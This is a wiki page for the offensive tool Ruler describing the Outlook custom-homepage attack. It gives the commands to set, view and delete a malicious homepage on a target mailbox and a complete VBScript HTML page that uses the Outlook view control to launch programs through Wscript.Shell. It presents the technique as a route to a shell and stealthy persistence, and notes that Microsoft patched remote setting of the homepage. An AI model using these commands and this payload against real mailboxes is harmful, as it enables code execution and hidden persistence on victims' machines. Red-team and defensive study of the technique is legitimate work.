Skip to content

Homepage

Etienne Stalmans edited this page Sep 15, 2018 · 3 revisions

Homepage

Ruler can get a shell through custom homepages. This is especially useful for persistence, as a homepage can lie dormant in the inbox, nearly undetectable.

The low down on the homepage attack is explained in the Outlook Home Page blog post.

To access the HomePage option, you need to use the homepage command. There are multiple sub-commands to homepage:

Display

You can view the current homepage value using the display command. This will display the current URL and whether this is active or not.

./ruler --email [email protected] homepage display

Add

Setting a new homepage couldn't be simpler, you simply use Ruler to set the new homepage to your exploit URL:

./ruler --email [email protected] homepage add --url "http://yourserver/pew.html"

The homepage attack requires your custom homepage to contain the "exploit", a basic version of this is:

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("notepad")
 End Sub
-->

</script>
</head>
<body>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>

Delete

Deleting an existing is done in a similar way to deleting rules.

./ruler --email [email protected] homepage delete

Persistence

Microsoft patched this attack by preventing the Homepage from being set remotely. Ben Wilson found that you can still use the homepage for persistence if you have access to the host. He documented this in an excellent blog post: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

Clone this wiki locally